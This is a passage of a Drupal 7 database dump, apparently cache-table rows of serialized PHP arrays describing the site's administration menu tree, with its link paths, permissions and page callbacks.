pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423658761,1),('links:management:tree-data:en:0ead175204b0a531a097965e14d0e932a7eaa5bc0aac4de52623f219a2a61688','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:5:{i:30;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"30\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:21:\"admin/structure/block\";s:11:\"router_path\";s:21:\"admin/structure/block\";s:10:\"link_title\";s:6:\"Blocks\";s:7:\"options\";s:129:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"bartik\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:6:\"Blocks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:6:{i:92;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"92\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:25:\"admin/structure/block/add\";s:11:\"router_path\";s:25:\"admin/structure/block/add\";s:10:\"link_title\";s:9:\"Add block\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:2:\"92\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:38:\"a:1:{i:0;s:20:\"block_add_block_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:9:\"Add block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:131;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"131\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:33:\"admin/structure/block/list/bartik\";s:11:\"router_path\";s:33:\"admin/structure/block/list/bartik\";s:10:\"link_title\";s:6:\"Bartik\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"131\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:2737:\"a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\